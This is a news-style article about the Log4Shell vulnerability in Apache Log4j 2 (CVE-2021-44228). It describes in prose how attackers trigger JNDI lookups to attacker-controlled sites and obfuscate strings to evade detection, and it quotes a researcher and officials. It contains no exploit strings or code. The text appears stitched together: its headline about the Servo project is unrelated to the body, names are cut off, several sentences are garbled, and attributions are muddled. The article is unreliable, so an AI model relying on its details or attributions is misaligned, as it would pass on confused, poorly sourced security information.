Servo Project Joins The Linux Foundation Fold Desco

A Vulnerability in the open-source Apache logging library Log4j sent system administrators and security professionals scrambling over the weekend known as Log4Shell, the flaw is exposing some of the world's most popular applications and services. 

“What is almost certain is that for years people will be discovering the long tail of new vulnerable software as they think of new places to put exploit strings,” says independent security researcher Valentin “This will probably be showing up in assessments and penetration tests of custom enterprise apps for a long time.” 

Microsoft’s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell”. 

An attacker performs an HTTP request against a target system, which generates a log using Log4j 2 that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems. 

The vulnerability allows unauthenticated remote code execution, and it is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j 2 vulnerable component. 

As security team that work to detect the exploitation of the vulnerability, attackers have added confusion to these requests to evade detections based on request patterns. We’ve seen things like running a lower or upper command within the exploitation string and even more complicated obfuscation attempts that are all trying to bypass string-matching detections. 

Security team is setting up a dedicated website to provide information and counter “active disinformation,” said Monish, executive assistant director for cybersecurity at the team. The vulnerability would “allow remote attackers to easily take control of the system in which they exploit it,” he said. 

It’s going to take “sustained effort” for organizations to become secure, with diligence needed even after applying patches from Apache, Monish said. 

Attackers will still look for creative new ways to discover and continue exploiting as many vulnerable systems as possible. The scariest part of the Log4Shell, though, is how many organizations won't even realize that they have systems at risk.